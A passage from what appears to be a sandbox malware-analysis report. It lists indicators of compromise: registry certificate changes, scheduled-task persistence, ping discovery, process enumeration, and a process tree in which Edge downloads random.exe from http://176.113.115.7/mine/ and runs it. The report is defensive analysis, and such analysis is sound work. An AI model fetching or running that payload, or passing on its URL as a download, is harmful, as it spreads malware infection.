2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	pcidrv.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\SystemCertificates\CA\Certificates\00ABEFD055F9A9C784FFDEABD1DCDD8FED741436	pcidrv.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\SystemCertificates\CA\Certificates\00ABEFD055F9A9C784FFDEABD1DCDD8FED741436\Blob = 03000000010000001400000000abefd055f9a9c784ffdeabd1dcdd8fed741436140000000100000014000000bbbcc347a5e4bca9c6c3a4720c108da235e1c8e8040000000100000010000000af1c77aecc8d77e9aacb0c475840c3920f0000000100000020000000e644ba6963e335fe765cb9976b12b10eb54294b42477764ccb3a3acca3acb2fc1900000001000000100000002cd60f91d0dfd482d593b92501780d005c0000000100000004000000000800001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000000905000030820505308202eda00302010202104ba85293f79a2fa273064ba8048d75d0300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3234303331333030303030305a170d3237303331323233353935395a3033310b300906035504061302555331163014060355040a130d4c6574277320456e6372797074310c300a0603550403130352313030820122300d06092a864886f70d01010105000382010f003082010a0282010100cf57e5e6c45412edb447fec92758764650288c1d3e88df059dd5b51829bdddb55abffaf6cea3beaf00214b625a5a3c012fc55803f689ff8e1143ebc1b5e01407968f6f1fd7e7ba8139097565b7c2af185b372628e7a3f4072b6d1affab58bc95ae40ffe9cb57c4b55b7f780d1861bc17e754c6bb4991cd6e18d18085eea66536bc74eabc504ceafc21f338169394bab0d36b3806cd16127aca5275c8ad76b2c29c5d98455c6f617bc62dee3c13528601d957e6381cdf8db51f92919ae74a1ccc45a87255f0b0e6a307ecfda71b669e3f488b71847158c93afaef5ef25b442b3c74e78fb247c1076acd9ab70d96f712812651540aec61f6f7f5e2f28ac8950d8d0203010001a381f83081f5300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030206082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e04160414bbbcc347a5e4bca9c6c3a4720c108da235e1c8e8301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30130603551d20040c300a3008060667810c01020130270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f300d06092a864886f70d01010b0500038202010092b1e74137eb799d81e6cde225e13a20e9904495a3815ccfc35dfdbda070d5b19628220bd2f228cf0ce7d4e6438c24221dc14292d109af9f4bf4c8704f2016b15add01f61ff81f616b1427b0728d63aeeee2ce4bcf37ddbba3d4cde7ad50adbdbfe3ec3e6236709931a7e88dddea62e212aef59cd43d2c0caad09c79beea3d5c446e9631635a7dd67e4f24a04b057f5e6fd2d4ea5f334b13d657b6cade51b85da3098274fdc7789eb3b9ac16da4a2b96c3b68b628ff97419a29e03dee96f9bb00fd2a05af6855cc204b7c8d54e32c4bf045dbc29f6f7818f0c5d3c53c940908bfbb60865b9a421d509e51384843782ce1028fc76c206257a46524dda5372a4273f6270acbe694800fb670fdb5ba1e8d703212dd7c9f69942398343df770a1208f125d6ba9419541888a5c58ee11a9993796bec1cf93140b0cc3200df9f5ee7b492ab9082918d0de01e95ba593b2e4b5fc2b74635523906c0bdaaac52c122a0449799f70ca021a7a16c714716170168c0caa62665047cb3aec9e79455c26f9b3c1ca9f92ec5201af076e0beec18d64fd825fb7611e8bfe6210fe8e8ccb5b6a7d5b8f79f41cf6122466a83b668972e7cea4e95db23eb2ec82b2884a460e949f4442e3bf9ca625701e25d9016f9c9fc7a23488ea6d58172f128fa5dcefbed4e738f942ed241949899dba7af705ff5befb0220bf66276cb4adfa75120b2b3ece039e	pcidrv.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe\:Zone.Identifier:$DATA	random.exe

Runs ping.exe 1 TTPs 27 IoCs

Remote System Discovery

T1018

pid	Process
6244	PING.EXE
28616	PING.EXE
27420	PING.EXE
7792	PING.EXE
20724	PING.EXE
20996	PING.EXE
13836	PING.EXE
3908	PING.EXE
25648	PING.EXE
30100	PING.EXE
27292	PING.EXE
14584	PING.EXE
30576	PING.EXE
26332	PING.EXE
23736	PING.EXE
15756	PING.EXE
31596	PING.EXE
14480	PING.EXE
5452	PING.EXE
10188	PING.EXE
13332	PING.EXE
14492	PING.EXE
17360	PING.EXE
10164	PING.EXE
30552	PING.EXE
31248	PING.EXE
3388	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4704	schtasks.exe
3692	schtasks.exe
17384	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
128	random.exe
128	random.exe
2552	rapes.exe
2552	rapes.exe
4832	rapes.exe
4832	rapes.exe
1224	bae6544296.exe
1224	bae6544296.exe
488	1ba54af266.exe
488	1ba54af266.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
488	1ba54af266.exe
488	1ba54af266.exe
488	1ba54af266.exe
488	1ba54af266.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
1676	9sWdA2p.exe
1676	9sWdA2p.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
1676	9sWdA2p.exe
1676	9sWdA2p.exe
1676	9sWdA2p.exe
1676	9sWdA2p.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
4084	but2.exe
4084	but2.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
5764	Jordan.com
5764	Jordan.com
5764	Jordan.com
5764	Jordan.com
5764	Jordan.com
5764	Jordan.com
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
5776	MSBuild.exe
5776	MSBuild.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	3876	Taskmgr.exe
Token: SeSystemProfilePrivilege	3876	Taskmgr.exe
Token: SeCreateGlobalPrivilege	3876	Taskmgr.exe
Token: SeDebugPrivilege	6056	tasklist.exe
Token: SeDebugPrivilege	5180	tasklist.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	6036	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
128	random.exe
3628	msedge.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
5764	Jordan.com
5764	Jordan.com
5764	Jordan.com
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe
3876	Taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2244	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3628 wrote to memory of 4636	3628	msedge.exe	81
PID 3628 wrote to memory of 4636	3628	msedge.exe	81
PID 3628 wrote to memory of 3576	3628	msedge.exe	82
PID 3628 wrote to memory of 3576	3628	msedge.exe	82
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 4552	3628	msedge.exe	83
PID 3628 wrote to memory of 3088	3628	msedge.exe	84
PID 3628 wrote to memory of 3088	3628	msedge.exe	84
PID 3628 wrote to memory of 3088	3628	msedge.exe	84
PID 3628 wrote to memory of 3088	3628	msedge.exe	84
PID 3628 wrote to memory of 3088	3628	msedge.exe	84
PID 3628 wrote to memory of 3088	3628	msedge.exe	84
PID 3628 wrote to memory of 3088	3628	msedge.exe	84
PID 3628 wrote to memory of 3088	3628	msedge.exe	84
PID 3628 wrote to memory of 3088	3628	msedge.exe	84

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://176.113.115.7/mine/random.exe
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x264,0x7ff9ca25f208,0x7ff9ca25f214,0x7ff9ca25f220
  2⤵
  PID:4636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1784,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:11
  2⤵
  - Downloads MZ/PE file
  PID:3576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2184,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:2
  2⤵
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2540,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=2672 /prefetch:13
  2⤵
  PID:3088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3488,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3492,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4116,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:1380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4108,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=4156 /prefetch:9
  2⤵
  PID:3008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4164,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=4288 /prefetch:1
  2⤵
  PID:2488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4160,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:9
  2⤵
  PID:1404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4236,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=4492 /prefetch:14
  2⤵
  PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3500,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=5348 /prefetch:14
  2⤵
  PID:4648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3668,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:14
  2⤵
  PID:4712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3640,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:14
  2⤵
  PID:4932
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5928,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:14
  2⤵
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5988,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=6004 /prefetch:14
  2⤵
  PID:2004
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
    cookie_exporter.exe --cookie-json=1128
    3⤵
    PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5928,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:14
  2⤵
  PID:4324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6228,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=6212 /prefetch:14
  2⤵
  PID:4816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6472,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=6220 /prefetch:14
  2⤵
  PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6632,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=6532 /prefetch:1
  2⤵
  PID:3768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6536,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=6624 /prefetch:14
  2⤵
  PID:2324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6856,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:14
  2⤵
  PID:1164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7076,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=7208 /prefetch:14
  2⤵
  PID:4900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7352,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=7364 /prefetch:14
  2⤵
  PID:1240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7356,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=7544 /prefetch:14
  2⤵
  PID:4604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7228,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=7344 /prefetch:14
  2⤵
  PID:2892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7568,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=7520 /prefetch:14
  2⤵
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6548,i,4837119454268045672,18266521240746954234,262144 --variations-seed-version --mojo-platform-channel-handle=6028 /prefetch:14
  2⤵
  PID:4816
- C:\Users\Admin\Downloads\random.exe
  "C:\Users\Admin\Downloads\random.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  PID:128
